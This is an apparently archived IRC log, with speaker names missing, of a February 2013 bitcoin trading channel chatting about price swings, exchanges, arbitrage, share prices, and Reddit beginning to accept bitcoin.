adding * to the "not his real handle" nicks Feb 14 20:44:03 [BTCTC] [S.MPOE-PT] 5 @ 0.00066 = 0.0033 BTC [-] Feb 14 20:45:31 [BTCTC] [GSDPT] 4 @ 0.006 = 0.024 BTC [-] Feb 14 20:45:48 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1011 BTC [-] Feb 14 20:46:13 [BTCTC] [BASIC-MINING] 1 @ 0.332 BTC [-] Feb 14 20:46:49 ugh, reddit is bumming me out Feb 14 20:47:03 just hang on irc then, less hassle? Feb 14 20:47:07 true Feb 14 20:47:12 i mean, so dumb though Feb 14 20:47:17 don't understand FX Risk Feb 14 20:47:19 forward contracts Feb 14 20:47:26 [BTCTC] [BTC-BOND] 49 @ 0.01 = 0.49 BTC [+] Feb 14 20:47:39 yeah, this stuff is pretty far beyond most people who use the internet on a daily basis. Feb 14 20:47:42 why would they ? Feb 14 20:47:43 "if the price of bitcoins doubles, the price of S.DICE halves" Feb 14 20:47:48 if you made a risk you didn't make that risk. Feb 14 20:47:50 also, business. Feb 14 20:48:10 i'm like OH that is why every single stock on NYSE moves the same direction at the same time Feb 14 20:48:21 lol Feb 14 20:48:24 yes, but you get forward contracts or options to guarantee and hedge Feb 14 20:48:27 actually mjr_, these days it pretty much does Feb 14 20:48:36 well, not for me at least Feb 14 20:48:37 bernanke helicopters a trillion funbux into "economy" Feb 14 20:48:49 all pres howls about how "record new index soars!!11" Feb 14 20:48:55 i'm up 6 or 7% on S.DICE Feb 14 20:49:04 and up 25% on BTC Feb 14 20:49:26 so my total gain when measured in dollars is a combo of the two effects Feb 14 20:49:28 you got in late, ipo people are up like whatever, 80% on s.dice and 300% on btc Feb 14 20:49:31 i'm not saying there is NO correlation Feb 14 20:49:40 yeah of course Feb 14 20:49:52 hum interesting correlation! Feb 14 20:49:59 ;;calc 6.5/25 Feb 14 20:50:00 0.26 Feb 14 20:50:04 but still...these returns are great and that's before i have ever even received dividends Feb 14 20:50:06 ;;calc 8/30.0 Feb 14 20:50:07 0.266666666667 Feb 14 20:50:09 dude Feb 14 20:50:11 DUDE! Feb 14 20:50:17 Bugpowder are you copying this ? Feb 14 20:50:52 how long you been in mjr_ ? Feb 14 20:51:01 ;;calc .66 / 26 Feb 14 20:51:01 beginning of feb Feb 14 20:51:02 0.0253846153846 Feb 14 20:51:09 wut? Feb 14 20:51:12 so 5 months and 2 weeks converges to like 0.02! Feb 14 20:51:17 paper profits Feb 14 20:51:24 this is totally ponzi. Feb 14 20:51:29 there is just no way. Feb 14 20:51:42 0.0057 is what i got S.DICE for Feb 14 20:51:50 as smooth as 16yo bikini wax Feb 14 20:52:12 ;;ticker Feb 14 20:52:12 .0034 Feb 14 20:52:13 BTCUSD ticker | Best bid: 26.33672, Best ask: 26.36438, Bid-ask spread: 0.02766, Last trade: 26.30110, 24 hour volume: 143473.69366734, 24 hour low: 21.72100, 24 hour high: 26.67000, 24 hour vwap: 25.03657 Feb 14 20:52:16 http://imgur.com/a/EsExY Feb 14 20:52:23 yeah, if only i had gotten in then Feb 14 20:52:32 It was up to 4x till last night's bounce :( Feb 14 20:52:38 lol Feb 14 20:52:39 yeah Feb 14 20:53:05 but that position is up...i got the bitcoins on average for 21.22 so that position is up Feb 14 20:53:16 so i am up in total by the combination of the two Feb 14 20:53:37 also...how can people retroactively go back and make their bets smaller because bitcoins are worth more now? Feb 14 20:53:39 mjr_ what's your exit point ? or didn't establuish in advance ? Feb 14 20:53:44 revenue is revenue Feb 14 20:53:47 buy and hold Feb 14 20:53:51 aha Feb 14 20:54:03 well, there's this theory that people will bet less if btc are worth more. Feb 14 20:54:11 yes, that is true Feb 14 20:54:13 over the long run Feb 14 20:54:13 cause well... gamblers are rational people and everything Feb 14 20:54:17 i can totally see it. Feb 14 20:54:21 but they already bet and that is already his revenue Feb 14 20:54:31 so my tiny fraction of that revenue is already mine in dividends Feb 14 20:54:44 yes, for the current month. but past months are water under the bridge far as you're concerned Feb 14 20:54:54 they can't change that now Feb 14 20:55:07 yes Feb 14 20:55:08 true Feb 14 20:55:09 my point is that for february Feb 14 20:55:17 upwards and onwards though! Feb 14 20:55:20 i hope to get 3% on my position Feb 14 20:55:26 i am happy with that Feb 14 20:55:39 well if you want to look art it this way, i was making bets on diff this year as far back as aug/sept 2012 Feb 14 20:55:41 as opposed to just taking the ride on btc, i am basically doubling down my bet Feb 14 20:55:52 nice Feb 14 20:55:54 100 btc bet then worth like 700 or w/e, 200 btc won now worth like 5k ? Feb 14 20:55:58 they pay off well? Feb 14 20:56:00 yes. Feb 14 20:56:08 i also hold MPOE Feb 14 20:56:13 which is down from where i bought it Feb 14 20:56:18 even though btc is up Feb 14 20:56:24 people would take things like "diff will be under 50mn" at even money etc. Feb 14 20:56:25 again, the two are not the same Feb 14 20:56:37 lol Feb 14 20:56:45 [MPEX] [S.MPOE] 1005 @ 0.00063655 = 0.6397 BTC [+] Feb 14 20:56:46 [MPEX] [S.MPOE] 2805 @ 0.00063654 = 1.7855 BTC [-] Feb 14 20:56:48 [MPEX] [S.MPOE] 5000 @ 0.00063654 = 3.1827 BTC [-] Feb 14 20:56:49 [MPEX] [S.MPOE] 11190 @ 0.00063653 = 7.1228 BTC [-] Feb 14 20:56:54 remember, back in aug and even sept peoplethought bfl delivers 1st batch in oct Feb 14 20:57:02 yeah Feb 14 20:57:07 and by "thought" i mean swore their babies on Feb 14 20:57:22 yeah. there were massive bets and everything iirc. Feb 14 20:57:23 i am not at all interested in mining hardware speculation, if they deliver they deliver Feb 14 20:57:32 i was mostly into it to hedge Feb 14 20:57:36 which worked out ok. Feb 14 20:57:40 yeah smart move Feb 14 20:57:53 You getting a Dell? Feb 14 20:57:59 haha Feb 14 20:58:03 hm ? Feb 14 20:58:25 so my point is that the revenue they bring in and the dividends they pay is way more likely to change the share price than the price of btc at the moment Feb 14 20:58:33 its a joke from the Dell commericals Feb 14 20:58:40 mjr_ right. Feb 14 20:58:41 dell is being taken private Feb 14 20:58:55 because it sucks ? Feb 14 20:58:55 btc/usd could affect that but that remains to be seen Feb 14 20:58:59 lol i think so Feb 14 20:59:20 i never quite understood this taking private business. Feb 14 20:59:27 buying back all its shares Feb 14 20:59:32 i know what it means Feb 14 20:59:35 i know Feb 14 20:59:36 i never understood the sense of it. Feb 14 20:59:42 oh, i love the idea Feb 14 20:59:43 give me an example of a corp where it worked. Feb 14 20:59:48 they must have some awful shit on the books, or they couldn't get it to an attractive price for a buyer, otherwise why take it private? Feb 14 20:59:53 no more worrying about what analysts have to say Feb 14 21:00:02 you can think long term Feb 14 21:00:07 mod6 i suspect they have some wicked tax avoidance idea they'll tery Feb 14 21:00:10 without worrying about pissing people off every quarter Feb 14 21:00:31 public companies divorce the interest of the company from the interest of the owner Feb 14 21:00:46 not if they're well managed. Feb 14 21:00:59 ie. it may be best to invest ahead of the growth curve for a while, take a loss, for future gain Feb 14 21:01:01 mircea_popescu: could be. lot of companies upped their dividened payments before the end of '12 to front-run the up coming tax hikes. Feb 14 21:01:17 mod6 yah. Feb 14 21:01:22 but convincing joe six pack that you know best about servers or the tech market is too tough Feb 14 21:01:26 boy that disaster is gonna smart. Feb 14 21:01:28 they want to see pretty green arrows Feb 14 21:01:48 mjr_ it's not like joe six pack has sotck money Feb 14 21:01:51 hehehe Feb 14 21:01:53 good point Feb 14 21:01:57 maybe 401k Feb 14 21:02:08 but self directed ? Feb 14 21:02:14 maybe Feb 14 21:02:17 i know a lot who do Feb 14 21:02:20 but then again it is nyc Feb 14 21:02:20 negligible of total. Feb 14 21:02:31 even so Feb 14 21:02:48 how many times have i seen a company BEAT earnings and STILL get smoked Feb 14 21:02:56 lol actually Feb 14 21:03:01 lame Feb 14 21:03:02 netflix beat earnings and it went up 908534905034% Feb 14 21:03:06 to try to cater to a fickle market Feb 14 21:03:09 yes Feb 14 21:03:13 but aapl beat Feb 14 21:03:20 and went down like $50 Feb 14 21:03:34 i personally wouldn't bet on direction Feb 14 21:03:39 ya well, netflix didn't have every hipster tard on their wagon Feb 14 21:03:41 get a straddle and just play the volatility Feb 14 21:03:43 much to their benefit. Feb 14 21:04:15 still though, i sold a record # of widgets...ok you suck, we don't want your stock Feb 14 21:04:21 but i made more money than you expected Feb 14 21:04:26 [MPEX] [S.MPOE] 4410 @ 0.00063653 = 2.8071 BTC [-] Feb 14 21:04:27 i don't care, sell sell sell Feb 14 21:04:28 [MPEX] [S.MPOE] 9826 @ 0.00063601 = 6.2494 BTC [-] Feb 14 21:04:34 [MPEX] [S.MPOE] 2514 @ 0.000636 = 1.5989 BTC [-] Feb 14 21:04:35 netflix also secured big exclusive contracts with 2 major studios in the future Feb 14 21:04:43 mjr_ the key is if they find a new jobs. they don't, they're dead. Feb 14 21:04:46 irrational markets, focused on short term Feb 14 21:04:47 AMZN beat (barely iirc) and it went up a bunch too -- until the following week where exuberance dropped. I think traders were spooked by the -1.0% GDP print... and any good earnings news was like "heaven sent" Feb 14 21:05:08 yeah...that is my point, a private company doesn't worry about spooking anybody Feb 14 21:05:11 iz that's a good point yes Feb 14 21:05:13 you do what you want Feb 14 21:05:15 there's more data there, than just the earnings Feb 14 21:05:17 what you think is best Feb 14 21:05:17 prolly larger impact than the few cents Feb 14 21:05:31 so if it seems "irrational", maybe it's just that you haven't seen all the data everyone else has Feb 14 21:05:35 wall street is like a bunch of whiny spoiled children Feb 14 21:05:46 iz i was using that example deliberately :) Feb 14 21:05:51 yeah...the prop traders i see...they are super inside Feb 14 21:06:07 well, i'm glad i could help illustate your point there then :D Feb 14 21:06:10 they are scalping and playing around, they have no idea of fundamentals Feb 14 21:06:20 they are riding the emotions of others Feb 14 21:06:29 to make a penny or two Feb 14 21:06:35 just like an algorithm Feb 14 21:06:40 which doesn't care about any of that Feb 14 21:06:59 i think everyone gives these people WAY too much credit Feb 14 21:07:14 herd mentality Feb 14 21:07:51 in fact, some of them just buy and sell at the same price just to make liquidity rebates Feb 14 21:08:05 they could literally not care less about what the company does Feb 14 21:08:36 institutional investors are different Feb 14 21:08:53 they are a lot smarter, but still, driven by emotion to some degree Feb 14 21:11:36 im not sure i dig this entire reason/emotion debate. Feb 14 21:11:46 reason and emotion use the same circuitry but different heuristics is all Feb 14 21:11:57 not really as fundamentally different as people paint em Feb 14 21:13:51 eh Feb 14 21:13:53 just saying Feb 14 21:13:59 selling because you see red is dumb Feb 14 21:14:06 and i see a lot of people do that Feb 14 21:14:18 it is counter to normal Feb 14 21:14:23 when many are selling you should buy Feb 14 21:14:28 well, it's that intelligent markets theory or w/e Feb 14 21:14:28 and when many are buying you should sell Feb 14 21:14:49 advisors are actually telling people like stanford to sell when price goes down, and the more it goes down the more to sell Feb 14 21:14:49 i have seen people call up to check a position Feb 14 21:14:53 then rebuy when it's back up Feb 14 21:14:58 and i say you want me to flatten it? Feb 14 21:14:59 and they get paid $$$ for this Feb 14 21:15:09 that is my point Feb 14 21:15:17 the people will say no...don't sell Feb 14 21:15:28 they wait till they lose their profit and are down and then they sell Feb 14 21:15:42 because you want to own something that is profitable and you don't want to own something that is down Feb 14 21:15:47 exactly opposite of what you should do Feb 14 21:15:54 which is buy low sell high Feb 14 21:16:10 i'm down 4% on MPOE, i am going to double my position Feb 14 21:16:29 ya well, you don't know if it ever recovers is their idea Feb 14 21:16:34 yeah Feb 14 21:16:43 i mean... sure, i made money long on LEH Feb 14 21:16:53 but... most people'd have been ill advised to buy it Feb 14 21:17:02 but what they end up doing is buying at the top of the hill and selling at the bottom Feb 14 21:17:15 depends. some things actually go out. that's why i picked leh. Feb 14 21:17:20 cuz they get scared Feb 14 21:17:25 yeah true Feb 14 21:17:27 and at that time, citi and boa seemed primed for the same fate iirc. Feb 14 21:17:32 they did Feb 14 21:17:41 even goldman had rumors of failure Feb 14 21:17:45 and jpm Feb 14 21:17:48 yep Feb 14 21:17:51 which was funny, at the time Feb 14 21:17:51 jpm was way closer Feb 14 21:18:05 i'm actually reading "too big to fail" right now Feb 14 21:18:15 cause "everyone" knew if it comes to it fed is going to pick jpm to save Feb 14 21:18:20 if all banks default or something. Feb 14 21:18:25 yeah Feb 14 21:18:33 bailout was a very dirty word back then Feb 14 21:18:38 should still be IMO Feb 14 21:18:48 bankers are scumbags Feb 14 21:19:05 for the most part, no offense to any bankers Feb 14 21:19:27 but seriously, you get the upside, we get the downside Feb 14 21:19:32 great work if you can get it Feb 14 21:20:06 both .3 Feb 14 21:20:08 heh. Feb 14 21:21:32 hehehe, it is fun trying to front run people :) Feb 14 21:22:38 love jumping in front of a wall Feb 14 21:22:46 by the way, bitfloor is my new favorite exchange Feb 14 21:22:48 i love it Feb 14 21:23:07 let me save that in my directory. Feb 14 21:25:23 i got my money in there in a half hour with no ID, and i think a $2 fee Feb 14 21:26:05 nice, i just reg'd last night. didn't have time to explore. Feb 14 21:26:18 the bank of america option is the way to go Feb 14 21:26:21 if you have one by you Feb 14 21:26:24 i do. Feb 14 21:26:27 literally half hour Feb 14 21:26:31 but they are open when I am at work. Feb 14 21:26:40 and roman who runs it emailed me when i asked how long within 5 min Feb 14 21:26:42 close at 4 assholes Feb 14 21:26:50 lol yeah Feb 14 21:26:52 bankers hours Feb 14 21:26:58 shithead hours Feb 14 21:27:06 yeah Feb 14 21:27:10 also...nice big spreads Feb 14 21:27:15 i'm just market making for fun right now Feb 14 21:27:19 yeah, i will look more tonight. Feb 14 21:27:27 think it's like a .35 spread Feb 14 21:27:34 good security? safe to keep btc there? Feb 14 21:27:48 you know, a working amount? Feb 14 21:27:50 don't know Feb 14 21:27:56 DeadWeasel they had a breach and currently owe the customerbase btc Feb 14 21:28:01 yes Feb 14 21:28:02 oh my Feb 14 21:28:12 so, i wouldn't keep btc there. but if you're ok with the risk, hey. Feb 14 21:28:16 well, i'll just watch for now, thanks mircea_popescu Feb 14 21:28:22 yeah, i don't know if i will leave btc overnight Feb 14 21:28:35 but, the guy is trying to pay back at least Feb 14 21:28:41 and i think he has started Feb 14 21:28:45 i mean, Gox got hit hard. Feb 14 21:28:49 but this is way after that Feb 14 21:28:52 yeah Feb 14 21:28:53 when was bitfloor? Feb 14 21:29:26 http://gizmodo.com/5940507/bitcoin-exchange-bitfloor-suspends-operations-following-250k-hacker-heist Feb 14 21:29:29 i mean, for me...i can drop off cash on the corner, have it in the account in a half hour, get PAID to trade (liquidity rebates) and don't have to use Mt. Gox (best reason) Feb 14 21:30:03 so, maybe a little riskier, but also i've emailed the guy and erik said he is a good guy, so i feel somewhat comfortable with it Feb 14 21:30:20 not that he vouched in any way Feb 14 21:30:22 he IS a good guy Feb 14 21:30:23 I'm a good guy, send me btc Feb 14 21:30:28 he did some open source stuff, whiz kid Feb 14 21:30:35 yeah, his platform is nice Feb 14 21:30:37 but prudential is what it is. Feb 14 21:30:42 yeah Feb 14 21:30:54 i kinda want to help bring volume for many reasons Feb 14 21:31:06 he will be able to pay back if he collects more revenue Feb 14 21:31:21 i think having 80% of volume go through mt.gox is insane Feb 14 21:31:29 he is local and doesn't require id Feb 14 21:31:37 and he gives liquidity rebates... Feb 14 21:31:45 mjr_ it's not the case. Feb 14 21:31:46 handles FIX messages in his API Feb 14 21:31:55 well ID to withdraw cash Feb 14 21:31:57 i think Feb 14 21:32:01 but i can drop off anonymously Feb 14 21:32:06 and i have no interest in cash Feb 14 21:32:12 mt gox has something like over half, i think Feb 14 21:32:20 oh they advertise 80% Feb 14 21:32:47 well...to be fair they say july 2011 Feb 14 21:32:50 but still Feb 14 21:32:57 :p Feb 14 21:33:00 i think a bunch of small local exchanges is better for the ecosystem Feb 14 21:33:06 this is true Feb 14 21:33:11 and i find their limits and fees onerous Feb 14 21:33:20 their process is byzantine to me Feb 14 21:33:38 i don't understand the voucher system and why we need an extra layer of annoyance Feb 14 21:33:42 im curious how the recent bitcoinica drama will unfold. Feb 14 21:34:47 yeah Feb 14 21:34:54 always drama in bitcoinland Feb 14 21:35:10 has anyone used camp bx? they also look really good Feb 14 21:35:50 the bot has changed his amount to .13 and is putting downward pressure on BTC price. Feb 14 21:36:18 from .10 Feb 14 21:36:20 which bot ? Feb 14 21:36:23 ;;ticker Feb 14 21:36:24 BTCUSD ticker | Best bid: 26.41728, Best ask: 26.42859, Bid-ask spread: 0.01131, Last trade: 26.42859, 24 hour volume: 143011.50114582, 24 hour low: 21.72100, 24 hour high: 26.67000, 24 hour vwap: 25.04569 Feb 14 21:37:01 the one I assume is a bot because I see a .13 sell every 6 or 8 transactions, sometimes 3 in a row at .002 less than the last. Feb 14 21:37:18 seems like a bot,i've got no way to know. Feb 14 21:37:27 also...i find that these exchanges are much easier to arb Feb 14 21:37:37 look at bitfloor and then look at camp bx Feb 14 21:38:14 10 coins for sale at 26.65 Feb 14 21:38:35 I'll buy your 10 coins for $26.65. Feb 14 21:38:47 can buy at 26.40 on bitfloor Feb 14 21:38:55 read up Feb 14 21:39:03 i'm showing the arbitrage opportunity that exists right now Feb 14 21:39:11 Oh, you meant $26.65 each. ;P Feb 14 21:39:12 .25 Feb 14 21:39:23 gotta get to work on my bot Feb 14 21:39:35 I had the beginnings of a bot. Feb 14 21:39:38 cuz i can transfer between these two relatively easily Feb 14 21:39:39 me too Feb 14 21:39:46 it was just a spread finder Feb 14 21:39:57 if the spread was larger than the fees it would market make Feb 14 21:39:58 I was pleased to discover that once I had it talking to one exchange's API, it "just worked" with 3 others with no changes. Feb 14 21:40:13 nice Feb 14 21:40:21 i wish i could trust btc-e Feb 14 21:40:26 they have the best prices always i think Feb 14 21:40:35 But you don't trust, eh? Feb 14 21:40:59 eh don't know Feb 14 21:41:12 seems too far away Feb 14 21:41:19 i don't use mt. gox Feb 14 21:41:30 i've used bitinstant, local, bitfloor, and soon camp bx Feb 14 21:42:03 I used btc-e a couple times to exchange for LTC. Had no issues. Feb 14 21:42:46 nice Feb 14 21:42:56 just seems to hard for me personally to get money all the way there Feb 14 21:43:01 international wire Feb 14 21:43:03 wait days Feb 14 21:43:07 i want to move fast Feb 14 21:43:13 i just got btc in camp bx now Feb 14 21:43:23 so i can take advantage of that offer sitting on the books Feb 14 21:44:03 and they let you send hidden orders *drool* Feb 14 21:44:26 so much easier to front run :) i gotta get to work on this bot Feb 14 21:45:44 laaaaaaag zapped me out Feb 14 21:52:32 [MPEX] [S.MPOE] 6400 @ 0.00063973 = 4.0943 BTC [+] Feb 14 21:52:34 [MPEX] [S.MPOE] 1968 @ 0.00064034 = 1.2602 BTC [+] Feb 14 21:56:49 wtf 27 Feb 14 21:56:51 ;;ticker Feb 14 21:56:52 BTCUSD ticker | Best bid: 26.88167, Best ask: 26.91933, Bid-ask spread: 0.03766, Last trade: 27.00000, 24 hour volume: 148547.21940210, 24 hour low: 21.72100, 24 hour high: 27.03987, 24 hour vwap: 25.12082 Feb 14 21:57:00 ::bc,convert eur Feb 14 21:57:11 ;;bc,convert eur Feb 14 21:57:12 1 BTC = 27.00000 U.S. dollars = 20.2596233 Euros Feb 14 22:01:10 fuclk Feb 14 22:01:14 yea Feb 14 22:01:21 my words exactly. Feb 14 22:02:14 Ireally managed tofuck up my best trade ever Feb 14 22:02:25 oh well Feb 14 22:03:23 [MPEX] [O.BTCUSD.P240T] 1000 @ 0.05712394 = 57.1239 BTC [-] Feb 14 22:03:35 [MPEX] [O.BTCUSD.P250T] 1000 @ 0.07274391 = 72.7439 BTC [-] Feb 14 22:03:48 [MPEX] [O.BTCUSD.P260T] 1000 @ 0.09149325 = 91.4933 BTC [-] Feb 14 22:03:59 ;;ticker Feb 14 22:04:00 BTCUSD ticker | Best bid: 27.09800, Best ask: 27.17804, Bid-ask spread: 0.08004, Last trade: 27.23334, 24 hour volume: 151359.26250357, 24 hour low: 21.72100, 24 hour high: 27.25000, 24 hour vwap: 25.15996 Feb 14 22:04:01 the wow Feb 14 22:04:10 is fucked. Feb 14 22:04:17 it's like... wow. Feb 14 22:04:21 27 ? srlsy ?! Feb 14 22:04:28 went form 21 to 27 in 16 hours ? Feb 14 22:04:53 dat not good Feb 14 22:04:57 too bouncy Feb 14 22:05:39 ;;asks 26.5 Feb 14 22:05:40 There are currently 0 bitcoins offered at or under 26.5 USD, worth 0.0 USD in total. Feb 14 22:05:48 ;;asks 27 Feb 14 22:05:50 There are currently 0 bitcoins offered at or under 27.0 USD, worth 0.0 USD in total. Feb 14 22:05:56 damn Feb 14 22:06:02 asks disappeared in 2 seconds Feb 14 22:06:09 ;;asks 28 Feb 14 22:06:10 There are currently 10647.286 bitcoins offered at or under 28.0 USD, worth 294253.35604 USD in total. Feb 14 22:06:17 ;;asks 29 Feb 14 22:06:19 There are currently 13698.669 bitcoins offered at or under 29.0 USD, worth 381539.936416 USD in total. Feb 14 22:06:35 ;;bids 29 Feb 14 22:06:37 There are currently 0 bitcoins demanded at or over 29.0 USD, worth 0.0 USD in total. Feb 14 22:06:40 30 here we come Feb 14 22:07:26 thank you for saying that, i always get itchy trigger finger in these wild swings. I'm such an emotional woman Feb 14 22:08:44 fuk this Feb 14 22:09:02 dumps coming Feb 14 22:09:52 man, this is great Feb 14 22:10:10 i love these exchanges Feb 14 22:11:03 [HAVELOCK] [SDICE] 5 @ 0.723 = 3.615 BTC [-] Feb 14 22:12:49 picking out apartments in santa monica Feb 14 22:13:02 Bugpowder - you live in Santa Monica? Feb 14 22:14:36 [BTCTC] [S.DICE-PT] 5 @ 0.0063 = 0.0315 BTC [+] Feb 14 22:22:36 ;;ticker Feb 14 22:22:36 BTCUSD ticker | Best bid: 27.07455, Best ask: 27.08704, Bid-ask spread: 0.01249, Last trade: 27.24000, 24 hour volume: 153179.59959284, 24 hour low: 21.72100, 24 hour high: 27.25000, 24 hour vwap: 25.18652 Feb 14 22:23:40 12K to 28. Everyone expect a big drop at 30? Feb 14 22:23:46 or more ilke 32/35? Feb 14 22:23:57 i know we don't know, but what does your gut expect/ Feb 14 22:24:00 ? Feb 14 22:24:10 ;;slap deadweasel Feb 14 22:24:20 Error: timed out Feb 14 22:24:25 Gribble! Feb 14 22:24:34 don't die on me! Feb 14 22:24:40 I need a good spank! Feb 14 22:24:44 ;;slap deadweasel Feb 14 22:25:01 relieved* Feb 14 22:25:10 ;;ticker Feb 14 22:25:10 BTCUSD ticker | Best bid: 27.20000, Best ask: 27.22800, Bid-ask spread: 0.02800, Last trade: 27.20000, 24 hour volume: 153518.46183669, 24 hour low: 21.72100, 24 hour high: 27.25000, 24 hour vwap: 25.19122 Feb 14 22:26:44 dinner time tonight, 40-70kBTC dum Feb 14 22:26:45 p Feb 14 22:26:50 probably Feb 14 22:26:56 if last night is any indicator Feb 14 22:28:06 jesus what Feb 14 22:32:08 [MPEX] [O.BTCUSD.P260T] 1000 @ 0.08972507 = 89.7251 BTC [-] Feb 14 22:32:13 [MPEX] [O.BTCUSD.P250T] 1000 @ 0.07128309 = 71.2831 BTC [-] Feb 14 22:32:19 [MPEX] [O.BTCUSD.P240T] 1000 @ 0.05592943 = 55.9294 BTC [-] Feb 14 22:33:53 http://blog.reddit.com/2013/02/new-gold-payment-options-bitcoin-and.html Feb 14 22:35:33 This will make a news splash for sure Feb 14 22:36:32 o hey Feb 14 22:36:44 somewhatbashful will love that1. Feb 14 22:37:58 [MPEX] [O.BTCUSD.P230T] 1000 @ 0.04308293 = 43.0829 BTC [-] Feb 14 22:40:06 why is there going to be a dump? Feb 14 22:41:33 a day ago or so 250k ask wall shortly appeared on mtgox Feb 14 22:42:00 if it wasn't shoped, it's likely it's perparing for dump Feb 14 22:42:21 http://www.btcguild.com/halloffame.php Feb 14 22:42:23 i'm trying to buy reddit gold with my bitcoin gems. someone help! Feb 14 22:42:25 alleged asicminer 2.2th Feb 14 22:42:28 ;;sell 250000 Feb 14 22:42:29 (sell [at|@] []) -- Logs a sell order for units of per unit, in units of . Use the optional field to put in any special notes. may include an arithmetical expression, and {mtgox(ask|bid|last)} to index price to mtgox ask, bid, or last price. May also include expression of (1 more message) Feb 14 22:42:48 15 blocks found by it Feb 14 22:42:58 ;;bc,sell 250000 Feb 14 22:42:59 Error: "bc,sell" is not a valid command. Feb 14 22:43:25 oh wow, so asicminer is doing good i guess Feb 14 22:43:59 by now it's 1/3 of the whole pool Feb 14 22:44:15 and if indeed they have 12th it will be 16th in btcguild out of 37th total Feb 14 22:44:20 closing in on 50% Feb 14 22:44:50 Network total 23.541 Thash/s atm, which is even worse. Feb 14 22:44:58 and makes the 2th figure look like shenanigans really. Feb 14 22:45:38 ;;ticker Feb 14 22:45:39 BTCUSD ticker | Best bid: 27.25414, Best ask: 27.30710, Bid-ask spread: 0.05296, Last trade: 27.50000, 24 hour volume: 157549.28385180, 24 hour low: 21.72100, 24 hour high: 27.50000, 24 hour vwap: 25.25535 Feb 14 22:47:27 ;;bc,convert eur Feb 14 22:47:29 1 BTC = 27.50000 U.S. dollars = 20.6348015 Euros Feb 14 22:47:36 I think with this news, it's going to $30 for sure Feb 14 22:48:12 why so ? Feb 14 22:48:16 fresh injection of hype Feb 14 22:49:03 a that Feb 14 22:49:04 ya Feb 14 22:50:01 [MPEX] [S.MPOE] 6250 @ 0.0006375 = 3.9844 BTC [-] Feb 14 22:50:03 [MPEX] [S.MPOE] 11450 @ 0.000637 = 7.2937 BTC [-] Feb 14 22:50:41 [MPEX] [S.DICE] 500 @ 0.00627988 = 3.1399 BTC [-] Feb 14 22:50:43 [MPEX] [S.DICE] 650 @ 0.00628 = 4.082 BTC [+] Feb 14 22:51:12 ;;market --sell 250000 Feb 14 22:51:13 A market order to sell 250000 bitcoins right now would net 3327608.8468 USD and would take the last price down to 2.2000 USD, resulting in an average price of 13.3104 USD/BTC. Feb 14 22:51:36 https://bitcointalk.org/index.php?topic=144046.0;topicseen Feb 14 22:51:36 wow. if that happens, i be buying. Feb 14 22:51:50 reddit lulz "67117 identity reviled, it's asicminer" Feb 14 22:52:00 jurov they said so iirc Feb 14 22:52:23 they're reviled Feb 14 22:54:43 I thought we already knew this? Feb 14 22:55:08 ;;ud reviled Feb 14 22:55:09 http://www.urbandictionary.com/define.php?term=reviled | 1. to assail with contemptuous or opprobrious language; address or speak of abusively. 2. to speak abusively. Feb 14 22:55:18 hahaah owned me. Feb 14 22:55:23 thought you misspelled revealed. Feb 14 22:55:57 reddit just started accepting bitcoins Feb 14 22:56:06 going through coinbase Feb 14 22:56:22 yeh Feb 14 22:56:46 so now, if every redditor at least just sees the option if they go to pay Feb 14 22:57:01 they will at least think, oh that's a thing Feb 14 22:57:29 could be big publicity Feb 14 22:58:02 [HAVELOCK] [SDICE] 5 @ 0.739 = 3.695 BTC [+] Feb 14 22:58:52 that'd actually be pretty cool. Feb 14 22:58:59 it makes sense for them Feb 14 22:59:11 even just offering the option... Feb 14 22:59:16 exposure Feb 14 22:59:24 gonna start an email campaign...now Feb 14 23:00:13 this is crazy good publicity Feb 14 23:01:35 perhaps the most important news event since the Silk Road story on Gawker Feb 14 23:04:40 what's this, reddit takes bitcoins now? nice :) Feb 14 23:07:22 yeah Feb 14 23:07:31 i'm sure not everyone even uses reddit gold Feb 14 23:07:39 and those that do may not even choose to use btc Feb 14 23:07:47 but at least they will have heard of it now Feb 14 23:08:22 i think if many people push to get online content providers to offer it Feb 14 23:08:43 netflix, hulu plus, spotify, pandora, etc Feb 14 23:08:52 that would be very nice Feb 14 23:09:00 and it fits in very well with their model Feb 14 23:09:14 though it would be nice if there was a wallet that did recurring payments Feb 14 23:11:01 mjr_: cool. /me doesn't use reddit, but i hear it's pretty big. Feb 14 23:11:11 also, wallet with recurring payments... that's called a cronjob :D Feb 14 23:11:24 bitcoin sentiment is shifting from "lolz… monopoly money" to "wtf? really?" Feb 14 23:11:27 yeah, the bitcoin channel is ok, though not super smart financially speaking Feb 14 23:11:32 exactly Feb 14 23:11:33 though really i'm not sure i'd want to do any recurring payments automatically. Feb 14 23:11:48 and i know cron jobs :( so like i said we need a wallet with recurring payments Feb 14 23:12:01 there's a protocol being developed for payment requests and receipts and stuff, that would probably be pretty good for it. Feb 14 23:12:06 sweet Feb 14 23:12:16 just saying that would be a great feature to offer a netflix Feb 14 23:12:32 they love recurring monthly stuff vs they have to choose to pay each month Feb 14 23:12:41 makomk malaimo markedathome maximian midnightmagic mircea_popescu mjr_ mjr__ mod6 molec Feb 14 23:12:44 maximian exactly. Feb 14 23:12:47 yes, it's good for the seller, bad for the buyer.... Feb 14 23:12:57 (i.e., a lot of those guys count on people forgetting to cancel) Feb 14 23:13:47 http://bitcoincharts.com/charts/chart.png?width=940&m=mtgoxUSD&SubmitButton=Draw&r=60&i=&c=0&s=&e=&Prev=&Next=&t=S&b=&a1=&m1=10&a2=&m2=25&x=0&i1=&i2=&i3=&i4=&v=1&cv=0&ps=0&l=0&p=0& Feb 14 23:13:49 dat cock. Feb 14 23:14:27 howdy mircea_popescu :) Feb 14 23:14:33 hey! Feb 14 23:16:13 yeah, i mean, that is kinda on the buyer Feb 14 23:16:18 you don't like, you cancel Feb 14 23:16:49 but, i kinda appreciate not having to think about netflix, just automatically take my $7...if i had to call or actually do something...probably wouldn't be worth the effort Feb 14 23:17:18 mjr_ prolly can have an app. Feb 14 23:17:25 true Feb 14 23:17:39 by the way...notice that reddit went through coinbase... Feb 14 23:17:58 i think they will do better as online wallet/vendor support than as actual bitcoin exchange Feb 14 23:18:30 TBH, it is my second least favorite method after mt gox Feb 14 23:20:58 is there a way to tweet a bitcoin at someone? Feb 14 23:28:47 [MPEX] [S.MPOE] 4321 @ 0.0006394 = 2.7628 BTC [+] Feb 14 23:28:48 [MPEX] [S.MPOE] 14779 @ 0.00063957 = 9.4522 BTC [+] Feb 14 23:29:10 ;;ticker Feb 14 23:29:11 BTCUSD ticker | Best bid: 26.50000, Best ask: 27.00000, Bid-ask spread: 0.50000, Last trade: 26.50000, 24 hour volume: 162182.55852551, 24 hour low: 21.72100, 24 